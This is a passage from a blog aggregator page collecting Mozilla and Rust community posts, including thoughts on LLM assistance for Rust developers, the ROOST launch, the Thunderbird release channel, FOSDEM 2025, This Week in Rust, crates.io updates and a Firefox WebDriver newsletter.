People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to cleanup your code. With the upcoming Rust 2024 edition, cargo fix---edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit, if the destructor happens to be a lock guard or something with side effects. In practice when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the name of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it and better, and if could ask questions if it was feeling unsure.

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question, suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow? How do you make it faster? Or, even worse, suppose that you are trying to turn our network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions as well (from Emery Berger’s group at UMass, the professor I talked about earlier).

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true may more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model, they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigous energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As far as the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling serveants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right I did make a mistake, here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM like a “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed by the LLM in the background but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla BlogROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike ensuring that a broad set of stakeholders have a vested stake in its success. This is critical to building accessible, scalable and resilient safety infrastructure all of us need for the AI era. 

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support by technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges such as eliminating child sexual abuse material (CSAM) from AI datasets and models. 

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated  “when it comes to AI Safety and Security, openness is an antidote not a poison.” 

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (which was an official event on the road to the French AI Action Summit happening this week), brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of  the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community. 

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Don Martithe #Eurostack, so hot right now

Is it just me or is it all about Europe right now? Put on some Kraftwerk and follow along I guess.

Fedora Chooses Forgejo! This is GitHub-like project hosting software with version control, issues, pull requests, all the usual stuff. I have a couple of small projects on Codeberg, which is the (EU) hosted nonprofit instance and it works fine as far as I can tell. Also a meissa GmbH presentation at FOSDEM 2025 You know X, Facebook, Xing, SourceForge? What about GitHub? It is time to de-risk OpenSource engagement!

Lots more Europe-hosted Saas, too. Baldur Bjarnason has more info on Todo notes as a storm approaches

The Sovereign Tech Agency is supporting some Linux plumbing: Arun Raghavan: PipeWire ♥ Sovereign Tech Agency.

The northern German state of Schleswig-Holstein is moving 30,000 PCs from Microsoft Windows and Office to Linux and LibreOffice: LibreOffice at the Univention Summit 2025 I know, I know, government in Germany goes desktop Linux is the hey, Rocky, watch me pull a rabbit out of my hat of IT, but this time they’re not up against Microsoft in its prime, they’re up against a new generation that can’t open their old files, while LibreOffice can.

They Said It Couldn’t Be Done by Pierre-Carl Langlais, Anastasia Stasenko, and Catherine Arnett. These represent the first ever models trained exclusively on open data, meaning data that are either non-copyrighted or are published under a permissible license. Trained on the Jean Zay supercomputer. Related: Pirate Libraries Are Forbidden Fruit for AI Companies. But at What Cost?

Scott Locklin lists Examples of group madness in technology. One of the worst arguments I hear is that thing X is inevitable because the smart people are doing it. As I’ve extensively documented over the last 15 years on this blog, smart people in groups are not smart and are even more subject to crazes and mob behavior as everyone else.

Not a European product: Framework Laptop’s RISC-V board for open source diehards is available for $199 but there is a Europe angle here. European Union Seeks Chip Sovereignty Using RISC-V - EE Times, RISC-V Summit Europe. RISC-V holds significance for Europe due to its potential to foster innovation, enhance technological sovereignty, and stimulate economic growth within the region. By embracing RISC-V, European countries can reduce their dependency on foreign technologies and proprietary architectures, thereby enhancing their autonomy in critical sectors such as telecommunications, cybersecurity, and data processing.

Also international, not Europe-specific: Postgres full-text search is Good Enough! by Rachid Belaid. (But there is a tech autonomy angle, and an active PostgreSQL Europe, so for practical purposes PostgreSQL is part of the Eurostack.)

Good advice from tante/Jürgen Geuter: Innovation is a distraction The demand for more Innovation (and sometimes even the request for more research) has become a way to legitimize not doing anything. A way to say the unpleasant solutions we have are not perfect but in the future there might be a magic solution that doesn’t bother us and everyone gets a fucking unicorn.

Marloes de Koning interviews Cristina Caffarra. ‘We have to get to work and put Europe first. But we are late. Terribly late’ You really don’t have to buy everything in Europe, says the competition expert, who is familiar with the criticism that the American supply is simply superior. But start with 30 percent of your procurement budget in Europe. That already makes a huge difference. (That seems like an easy target. Not only are way more than 30 percent of the European Alternatives up to a servicable level by now, but unfortunately a lot of the legacy US vendors are having either quality or compliance problems, or both. The risks, technical and otherwise, keep going up.

Greg Nojeim and Silvia Lorenzo Perez cover Trump’s Sacking of PCLOB Members Threatens Data Privacy Aside from its importance in protecting civil liberties, the PCLOB cannot play its key role in enforcing U.S. obligations under the EU-U.S. Data Privacy Framework (DPF) while it lacks a quorum of members. The European Commission would lose a key oversight tool for which it bargained, and the adequacy decision that it issued to support the DPF could be struck down under review at the Court of Justice of the European Union (CJEU), which struck down two predecessor EU-U.S. data privacy arrangements, the Safe Harbor Agreement and the Privacy Shield.

Karl Bode writes, Apple Has To Pull Its “AI” News Synopses Because They Were Routinely Full Of Shit (If the features unavailable in Europe are problematic anyway…)

Sarah Perez covers Report: Majority of US teens have lost trust in Big Tech. Common Sense says that 64% of surveyed U.S. teens don’t trust Big Tech companies to care about their mental health and well-being and 62% don’t think the companies will protect their safety if it hurts profits. Over half of surveyed U.S. teens (53%) also don’t think major tech companies make ethical and responsible design decisions (think: the growing use of dark patterns in user interface design meant to trick, confuse, and deceive. A further 52% don’t think that Big Tech will keep their personal information safe and 51% don’t think the companies are fair and inclusive when considering the needs of different users. (What if the Eurostack becomes the IT version of those European food brands that sell well in other countries too?)

Mozilla ThunderbirdThunderbird Desktop Release Channel Will Become Default in March 2025

UPDATE (March 4, 2025): The Release Channel is now default! See our update post on how to make the switch with a manual install and what’s new in 136.

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel. It will provide monthly major releases instead of annual major releases. This provides several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase daily active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 daily active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on these release process details, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement at our Thunderbird Planning mailing list

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

About:CommunityFOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM wasn’t just another tech gathering. It is a representation of a vibrant community, open source innovation, and the spirit of collaboration. And we’re proud of being part of this amazing event since its inception.

This year, FOSDEM is celebrating its 25th anniversary. And unlike previous years’ gloomy weather, this year, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge in Mozilla’s and Thunderbird’s stands, where participants could play to win exclusive Mozilla t-shirts any many more special swag. It was a really fun way to introduce many projects from across pan-Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Casteluccio presented a talk about the usage of LLM’s to support Firefox developers with code review in the main track.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey on using the getaddrinfo API in Firefox.
  • Another Firefox engineer who’s working on Firefox Profiler, Nazim Can Altinova also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session like this where all of us can share our perspective, so thank you to all of you who attended the session!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
  • Then on the second half on Sunday, we also hosted the Mozilla devroom where we covered a wide range of Mozilla’s latest innovations from Mythbusting to Mozilla’s AI innovations and Firefox developments. Recordings will be available soon at FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In RustThis Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with performance of primary benchmarks showing no change over all.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.3% [0.2%, 0.6%] 32
Regressions ❌
(secondary)
0.5% [0.1%, 1.1%] 65
Improvements ✅
(primary)
-0.5% [-1.0%, -0.2%] 17
Improvements ✅
(secondary)
-3.1% [-10.3%, -0.2%] 20
All ❌✅ (primary) 0.0% [-1.0%, 0.6%] 49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups 49 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blogcrates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either: the crate has been published for less than 72 hours or the crate only has a single owner, and the crate has been downloaded less than 500 times for each month it has been published, and the crate is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered work-in-progress and e.g. the stability guarantees for the endpoints are not written down and the response schemas are also not fully documented yet.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • The crates.io team was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer ExperienceFirefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.

With the processing of actions now handled in the parent process the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Open Policy & Advocacy BlogNavigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what does openness mean and how it can enable trustworthy, innovative, and equitable outcomes?

The workshop followed the Columbia Convenings on Openness and AI, that Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, have brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

